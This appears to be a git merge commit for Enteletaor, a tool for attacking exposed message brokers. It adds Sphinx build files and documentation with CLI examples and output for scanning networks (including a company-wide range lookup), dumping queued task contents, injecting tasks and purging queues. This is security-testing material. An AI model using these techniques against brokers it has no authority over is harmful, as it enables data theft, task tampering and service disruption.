Merge branch 'develop'

This commit is contained in:
cr0hn
2016-03-04 23:33:59 +01:00
54 changed files with 2720 additions and 1145 deletions

1
.idea/.name generated
View File

@@ -1 +0,0 @@
Enteletaor

15
.idea/Enteletaor.iml generated
View File

@@ -1,15 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

22
.idea/STB-Core.iml generated
View File

@@ -1,22 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="PackageRequirementsSettings">
<option name="requirementsPath" value="$MODULE_DIR$/../Enteletaor/requirements.txt" />
</component>
<component name="ReSTService">
<option name="workdir" value="$MODULE_DIR$/../Enteletaor/enteletaor_lib/doc/en" />
<option name="DOC_DIR" value="$MODULE_DIR$/../Enteletaor/enteletaor_lib/doc/en" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

View File

@@ -1,13 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectCodeStyleSettingsManager">
<option name="PER_PROJECT_SETTINGS">
<value>
<XML>
<option name="XML_LEGACY_SETTINGS_IMPORTED" value="true" />
</XML>
</value>
</option>
<option name="PREFERRED_PROJECT_CODE_STYLE" value="Default (1)" />
</component>
</project>

View File

@@ -1,7 +0,0 @@
<component name="ProjectDictionaryState">
<dictionary name="Dani">
<words>
<w>enteletaor</w>
</words>
</dictionary>
</component>

6
.idea/encodings.xml generated
View File

@@ -1,6 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Encoding">
<file url="PROJECT" charset="UTF-8" />
</component>
</project>

15
.idea/enteletaor.iml generated
View File

@@ -1,15 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

View File

@@ -1,34 +0,0 @@
<component name="InspectionProjectProfileManager">
<profile version="1.0">
<option name="myName" value="Project Default" />
<option name="myLocal" value="true" />
<inspection_tool class="DocumentWriteJS" enabled="true" level="WARNING" enabled_by_default="true" />
<inspection_tool class="PlatformDetectionJS" enabled="true" level="WARNING" enabled_by_default="true" />
<inspection_tool class="PyMethodMayBeStaticInspection" enabled="false" level="WEAK WARNING" enabled_by_default="false" />
<inspection_tool class="PyPackageRequirementsInspection" enabled="true" level="WARNING" enabled_by_default="true">
<option name="ignoredPackages">
<value>
<list size="15">
<item index="0" class="java.lang.String" itemvalue="execnet" />
<item index="1" class="java.lang.String" itemvalue="cov-core" />
<item index="2" class="java.lang.String" itemvalue="py" />
<item index="3" class="java.lang.String" itemvalue="coverage" />
<item index="4" class="java.lang.String" itemvalue="pytest" />
<item index="5" class="java.lang.String" itemvalue="pytest-cov" />
<item index="6" class="java.lang.String" itemvalue="pytest-xdist" />
<item index="7" class="java.lang.String" itemvalue="wsgiref" />
<item index="8" class="java.lang.String" itemvalue="asyncssh" />
<item index="9" class="java.lang.String" itemvalue="Crypto" />
<item index="10" class="java.lang.String" itemvalue="xlsxwriter" />
<item index="11" class="java.lang.String" itemvalue="BeautifulSoup" />
<item index="12" class="java.lang.String" itemvalue="django-rest-swagger" />
<item index="13" class="java.lang.String" itemvalue="tornado" />
<item index="14" class="java.lang.String" itemvalue="lxml" />
</list>
</value>
</option>
</inspection_tool>
<inspection_tool class="Query_restricted" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="XHTMLIncompatabilitiesJS" enabled="true" level="WARNING" enabled_by_default="true" />
</profile>
</component>

View File

@@ -1,7 +0,0 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="PROJECT_PROFILE" />
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

14
.idea/misc.xml generated
View File

@@ -1,14 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="Add" />
<OptionsSetting value="true" id="Remove" />
<OptionsSetting value="true" id="Checkout" />
<OptionsSetting value="true" id="Update" />
<OptionsSetting value="true" id="Status" />
<OptionsSetting value="true" id="Edit" />
<ConfirmationsSetting value="0" id="Add" />
<ConfirmationsSetting value="0" id="Remove" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.4.3 virtualenv at ~/.virtualenvs/enteletaor" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml generated
View File

@@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/enteletaor.iml" filepath="$PROJECT_DIR$/.idea/enteletaor.iml" />
</modules>
</component>
</project>

6
.idea/vcs.xml generated
View File

@@ -1,6 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

14
.idea/webResources.xml generated
View File

@@ -1,14 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="WebResourcesPaths">
<contentEntries>
<entry url="file://$PROJECT_DIR$">
<entryData>
<resourceRoots>
<path value="file://$PROJECT_DIR$/enteletaor_lib/resources" />
</resourceRoots>
</entryData>
</entry>
</contentEntries>
</component>
</project>

View File

@@ -1,23 +0,0 @@
# Attacks
This document compiles the attacks implemented by Enteletaor.
## Specific by broker/MQ
Some attacks can only be performed against specific software. Here is the list:
## Redis
#. Poisoning cache
#. Execute remote script
## Common attacks
These attacks can be executed in all of brokers/MQ:
#. Read remote info
#. Looking for sensitive information (i.e. user/password)
#. Remote command injection
#. Listing remote process
#. Remove messages from queues
#. Reject all messages stored in queues to prevent clients from receiving them

View File

@@ -15,5 +15,3 @@ global-exclude .DS_Store
global-exclude .mailmap
prune enteletaor_lib/doc*
graft enteletaor_lib/resources/*

View File

@@ -7,15 +7,34 @@ Enteletaor
*Enteletaor: Message Queue & Broker Injection tool*
:Version: 1.0
:Code: https://github.com/cr0hn/enteletaor
:Issues: https://github.com/cr0hn/enteletaor/issues/
:Python version: Python 2 & Python 3
:Documentation: http://enteletaor.readthedocs.org
:Python version: Python 2.7.x & 3
:Author: Daniel Garcia (cr0hn) - @ggdaniel
What's Enteletaor
-----------------
Message Queue & Broker Injection tool that implements attacks to Redis, RabbitMQ and ZeroMQ.
Some of the actions you can do:
- Listing remote tasks.
- Read remote task content.
- Disconnect remote clients from Redis server (even the admin!)
- Inject tasks into remote processes.
- Make a scan to discover open brokers.
Currently supported brokers are:
- RabbitMQ (or AMQP compatible).
- ZeroMQ.
- Redis.
See documentation for more information.
What's new?
-----------
@@ -26,35 +45,4 @@ Version 1.0.0
- First version released
You can read entire list in CHANGELOG file.
Installation
------------
Installing Enteletaor is easy:
.. code-block:: bash
$ python -m pip install enteletaor
Quick start
-----------
You can display inline help writing:
.. code-block:: bash
enteletaor -h
Advanced options
----------------
There are the advanced options:
- **-v**, **-vv**, **-vvv**: Enable verbose mode.
References
----------
* OMSTD (Open Methodology for Security Tool Developers): http://omstd.readthedocs.org
* STB (Security Tool Builder): https://github.com/abirtone/STB
You can read entire list in CHANGELOG file.

177
doc/Makefile Normal file
View File

@@ -0,0 +1,177 @@
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = build
# User-friendly check for sphinx-build
ifeq ($(shell which $(SPHINXBUILD) >/dev/null 2>&1; echo $$?), 1)
$(error The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed, then set the SPHINXBUILD environment variable to point to the full path of the '$(SPHINXBUILD)' executable. Alternatively you can add the directory with the executable to your PATH. If you don't have Sphinx installed, grab it from http://sphinx-doc.org/)
endif
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
.PHONY: help clean html dirhtml singlehtml pickle json htmlhelp qthelp devhelp epub latex latexpdf text man changes linkcheck doctest gettext
help:
@echo "Please use \`make <target>' where <target> is one of"
@echo " html to make standalone HTML files"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@echo " json to make JSON files"
@echo " htmlhelp to make HTML files and a HTML help project"
@echo " qthelp to make HTML files and a qthelp project"
@echo " devhelp to make HTML files and a Devhelp project"
@echo " epub to make an epub"
@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
@echo " latexpdf to make LaTeX files and run them through pdflatex"
@echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx"
@echo " text to make text files"
@echo " man to make manual pages"
@echo " texinfo to make Texinfo files"
@echo " info to make Texinfo files and run them through makeinfo"
@echo " gettext to make PO message catalogs"
@echo " changes to make an overview of all changed/added/deprecated items"
@echo " xml to make Docutils-native XML files"
@echo " pseudoxml to make pseudoxml-XML files for display purposes"
@echo " linkcheck to check all external links for integrity"
@echo " doctest to run all doctests embedded in the documentation (if enabled)"
clean:
rm -rf $(BUILDDIR)/*
html:
$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
dirhtml:
$(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
singlehtml:
$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
@echo
@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
pickle:
$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
@echo
@echo "Build finished; now you can process the pickle files."
json:
$(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
@echo
@echo "Build finished; now you can process the JSON files."
htmlhelp:
$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
@echo
@echo "Build finished; now you can run HTML Help Workshop with the" \
".hhp project file in $(BUILDDIR)/htmlhelp."
qthelp:
$(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
@echo
@echo "Build finished; now you can run "qcollectiongenerator" with the" \
".qhcp project file in $(BUILDDIR)/qthelp, like this:"
@echo "# qcollectiongenerator $(BUILDDIR)/qthelp/OpenVAS2Report.qhcp"
@echo "To view the help file:"
@echo "# assistant -collectionFile $(BUILDDIR)/qthelp/OpenVAS2Report.qhc"
devhelp:
$(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
@echo
@echo "Build finished."
@echo "To view the help file:"
@echo "# mkdir -p $$HOME/.local/share/devhelp/OpenVAS2Report"
@echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/OpenVAS2Report"
@echo "# devhelp"
epub:
$(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
@echo
@echo "Build finished. The epub file is in $(BUILDDIR)/epub."
latex:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo
@echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
@echo "Run \`make' in that directory to run these through (pdf)latex" \
"(use \`make latexpdf' here to do that automatically)."
latexpdf:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through pdflatex..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
latexpdfja:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through platex and dvipdfmx..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf-ja
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
text:
$(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
@echo
@echo "Build finished. The text files are in $(BUILDDIR)/text."
man:
$(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
@echo
@echo "Build finished. The manual pages are in $(BUILDDIR)/man."
texinfo:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo
@echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
@echo "Run \`make' in that directory to run these through makeinfo" \
"(use \`make info' here to do that automatically)."
info:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo "Running Texinfo files through makeinfo..."
make -C $(BUILDDIR)/texinfo info
@echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
gettext:
$(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
@echo
@echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
changes:
$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
@echo
@echo "The overview file is in $(BUILDDIR)/changes."
linkcheck:
$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
@echo
@echo "Link check complete; look for any errors in the above output " \
"or in $(BUILDDIR)/linkcheck/output.txt."
doctest:
$(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
@echo "Testing of doctests in the sources finished, look at the " \
"results in $(BUILDDIR)/doctest/output.txt."
xml:
$(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml
@echo
@echo "Build finished. The XML files are in $(BUILDDIR)/xml."
pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 14 KiB

After

Width:  |  Height:  |  Size: 15 KiB

242
doc/make.bat Normal file
View File

@@ -0,0 +1,242 @@
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\OpenVAS2Report.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\OpenVAS2Report.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end

1
doc/source/__init__.py Normal file
View File

@@ -0,0 +1 @@
# -*- coding: utf-8 -*-

663
doc/source/advanced.rst Normal file
View File

@@ -0,0 +1,663 @@
Advanced usage
==============
Enteletaor implements many attacks and options to interact with different brokers:
- Redis
- RabbitMQ (or AMQP compatible)
- ZeroMQ
It also implements some attacks specific to the Redis server. This document tries to collect that information.
There are 3 types of actions implemented:
- Scanning
- Redis actions
- Tasks actions
Scanner
-------
Enteletaor implements a scanner that aims to detect open brokers. The scanning is implemented in pure Python, with no external dependencies such as ``nmap``.
The reason to implement a native scanner is that in ``nmap`` v7 not all scripts that detect open services work.
.. note::
You can also pass a hostname as the target, not only an IP.
Custom ports
++++++++++++
As you can read in :doc:`quickstart` document, you can scan a single host or a network. Syntax is nmap-like.
You can specify ports other than the Enteletaor defaults, using the ``-p`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/16 -p 5550,5551
Parallel scanning
+++++++++++++++++
By default, Enteletaor runs 20 concurrent scans. Internally this is implemented with greenlet threads. This means they are not "real" threads; you can think of a greenlet thread as a lightweight version of a thread.
We recommend using 40 concurrent scanning threads. Don't worry about overloading your system: green threads make this possible without a CPU-hungry process.
To change concurrency, you can use ``-c`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/24 -c 40
Saving results
++++++++++++++
Enteleteaor can export scan results as a JSON format, using ``--output`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10 --output results
Or:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10 --output results.json
.. note::
If you don't indicate the file extension, enteleteaor will add it for you.
Company lookup
++++++++++++++
This is a bit strange option. Typing ``-o`` enteleteaor will try to lookup the company name in RIPE, get all the IP ranges registered for it and add to scan.
For example, if you try to scan ``google.com`` it will add 1465 new hosts:
.. code-block:: bash
# enteletaor -vvvv scan -t google.com -o
[ * ] Starting Enteletaor execution
[ * ] -> Detected registered network '80.239.142.192/26'. Added for scan.
[ * ] -> Detected registered network '213.242.89.64/26'. Added for scan.
[ * ] -> Detected registered network '92.45.86.16/28'. Added for scan.
[ * ] -> Detected registered network '212.179.82.48/28'. Added for scan.
[ * ] -> Detected registered network '217.163.1.64/26'. Added for scan.
[ * ] -> Detected registered network '80.239.174.64/26'. Added for scan.
[ * ] -> Detected registered network '213.253.9.128/26'. Added for scan.
[ * ] -> Detected registered network '46.108.1.128/26'. Added for scan.
[ * ] -> Detected registered network '213.248.112.64/26'. Added for scan.
[ * ] -> Detected registered network '46.61.155.0/24'. Added for scan.
[ * ] -> Detected registered network '95.167.107.32/27'. Added for scan.
[ * ] -> Detected registered network '195.50.84.192/26'. Added for scan.
[ * ] -> Detected registered network '80.239.168.192/26'. Added for scan.
[ * ] -> Detected registered network '193.120.166.64/26'. Added for scan.
[ * ] -> Detected registered network '213.155.151.128/26'. Added for scan.
[ * ] -> Detected registered network '194.44.4.0/24'. Added for scan.
[ * ] -> Detected registered network '80.239.229.192/26'. Added for scan.
[ * ] -> Detected registered network '213.242.93.192/26'. Added for scan.
[ * ] -> Detected registered network '195.100.224.112/28'. Added for scan.
[ * ] -> Detected registered network '89.175.35.32/28'. Added for scan.
[ * ] -> Detected registered network '89.175.165.0/28'. Added for scan.
[ * ] -> Detected registered network '89.175.162.48/29'. Added for scan.
[ * ] - Number of targets to analyze: 1465
[ * ] - Starting scan
...
Tasks
-----
Currently you can do 4 sub-actions for tasks.
All of these actions are available only if the broker is open. An open broker means that no credentials are needed to connect to it.
.. note::
But.. what's a task? Oks, no problem, let's see:
When we use a process manager to handle background tasks, it uses an external communication system. This communication system is usually a broker.
Process managers need this communication system to send the information to be executed to the runner. Each runner waits for new information to process, and the broker lets them delegate the exchange problems.
So, we call this information a ``pending task``. This ``task`` is really some information waiting in the broker to be sent to the runner.
Listing remote tasks
++++++++++++++++++++
Basic usage
___________
If there are pending tasks in broker queue, we can analyze them. Enteleteaor allow us to list all tasks found. Although there is more than one task of each type in queue, only the task definition is displayed:
.. code-block:: bash
# enteleteaor -v tasks list-tasks -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - Remote process found:
[ * ] -> tasks.sum (param_0:int, param_1:int)
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] Done!
We can see that broker has 2 task definition stored:
- tasks.sum
- tasks.send_mail
Export Template
_______________
Enteletaor also permits injecting new tasks into the broker (see below). The way to inject them is to pass as input a JSON file with the information. Writing this file by hand can be a bit hard. To help us, Enteletaor can export a template.
With this template, we only must fill the appropriate field:
.. code-block:: bash
:linenos:
:emphasize-lines: 8
# enteleteaor -v tasks list-task -t 10.10.0.10 -T my_template -F tasks.send_mail
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - Remote process found:
[ * ] -> tasks.sum (param_0:int, param_1:int)
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] - Building template...
[ * ] - Template saved at: '/Users/Dani/Documents/Projects/enteletaor/enteletaor_lib/my_template.json'
[ * ] Done!
# cat my_template.json
[{"parameters": [{"param_position": 0, "param_value": null, "param_type": "str"}, {"param_position": 1, "param_value": null, "param_type": "str"}, {"param_position": 2, "param_value": null, "param_type": "str"}], "function": "tasks.send_mail"}]
In this example only export the function ``tasks.send_mail``.
Removing tasks
++++++++++++++
We also can remove all pending task from the broker queue. It's so simple:
.. code-block:: bash
# enteleteaor tasks remove -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - All tasks removed from '10.10.0.10'
[ * ] Done!
Dumping tasks content
+++++++++++++++++++++
Basic usage
___________
We can dump the content of tasks simply using raw-dump sub-command:
.. code-block:: bash
# enteleteaor tasks raw-dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.sum'
[ * ] - Input parameters:
[ * ] -> P0: 1
[ * ] -> P1: 0
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: marquerite@cordell.com
[ * ] -> P1: Can You Afford?
[ * ] -> P2: Axis alliance with Italy and Japan.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: amie@cordell.com
[ * ] -> P1: Read your review for John Mulaney You're missing out on points Not Cool, Guys DO NOT Commit These Instagram Atrocities
[ * ] -> P2: MolotovRibbentrop Pact of August 1939, Germany and subsequent declarations of war in Europe concluded with an invasion of Poland by Germany and the subsequent German unconditional surrender on 8 May 1945.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: willard@cordell.com
[ * ] -> P1: Wish What are our customers saying?
[ * ] -> P2: In June 1941, the European Axis powers and the coalition of the world.
[ * ] -> No more messages from server. Exiting...
[ * ] Done!
Streaming mode
______________
Sometimes we may want to listen in real time for new messages available in the broker. If we use the ``--streaming`` option, Enteletaor will wait for new messages:
.. code-block:: bash
:linenos:
:emphasize-lines: 17-20
# enteleteaor tasks raw-dump -t 10.10.0.10 --streaming
